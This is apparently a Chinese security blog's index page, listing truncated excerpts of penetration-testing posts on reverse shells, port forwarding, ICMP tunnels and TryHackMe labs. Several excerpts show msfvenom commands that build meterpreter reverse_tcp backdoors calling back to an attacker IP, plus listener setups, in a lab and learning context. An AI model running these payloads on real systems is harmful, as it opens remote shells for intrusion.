• 2024-07-13渗透测试基础--内网转发
    在渗透测试中,当我们获得了外网服务器(如web服务器,ftp服务器,mali服务器等等)的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段,一般情况下,内网中的其他机器是不允许外网机器访问的。这时候,我们可以通过端口转发(隧道)或将这台外网服务器设置成为
  • 2024-06-08记一次msf反弹shell小错误
    使用MSF生成后门程序,反弹shell设置攻击机IP和端口,生成后门程序sudomsfvenom-pwindows/meterpreter/reverse_tcplhost=172.24.4.7lport=4444-fexe-oattack.exe设置监听模块打开msfconsole使用以下命令设置监听模块msfconsoleuseexploit/multi/handlerset
  • 2024-02-08反弹shell
    概念反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机(被攻击的目标)主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。正向连接假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我
  • 2023-04-03ICMP隐蔽隧道攻击分析与检测(三)
     •ICMP隧道攻击工具特征分析 一、原理由于ICMP报文自身可以携带数据,而且ICMP报文是由系统内核处理的,不占用任何端口,因此具有很高的隐蔽性。通过改变操作系统默认填充的Data,替换成自己构造的数据,这就是ICMP隐蔽隧道的原理。 通常ICMP隧道技术采用ICMP的ICMP_ECHO和ICMP
  • 2023-02-26msfvenom常用payload命令
    windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-
  • 2023-01-14PHP后门反弹演示
    准备一台kali虚拟机一台win11物理机phpstudy开启Nginx和Mysqlphpstudy中已经搭建好DVWA靶场DVWA靶场的安全等级调整值low​注意:需要将杀毒软件个关了,否则有提示,黑
  • 2022-12-13【THM】Alfred(利用Jenkins错误配置提权)-练习
    本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/alfred通过学习相关知识点:利用Jenkins获取目标的初始shell,然后再利用Windows身份验证令牌(tokens)提升权
  • 2022-11-26红队隧道加密之OpenSSL加密反弹Shell(一)
    前言在红队的后渗透阶段中,往往需要反弹shell进行下一步的内网横向渗透,而这种反弹shell大多数都有一个缺点,那就是其传输的流量都是明文传输,相当容易被内网的防火软
  • 2022-10-20【THM】-Post-Exploitation Basics(后渗透基础)-学习
    观前提示本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/postexploit介绍本文主要涉及关于后渗透的基础知识,主要内容有:使用powerview和Bloodhound进行后
  • 2022-10-04反弹Shell小实验
    反弹Shell实验环境攻击机:kali(IP:192.168.40.132)目标机:CentOS(IP:192.168.40.135)实验步骤首先在攻击机监听一个随机端口:nc-lvp6767第二步在目标机输入命令:bash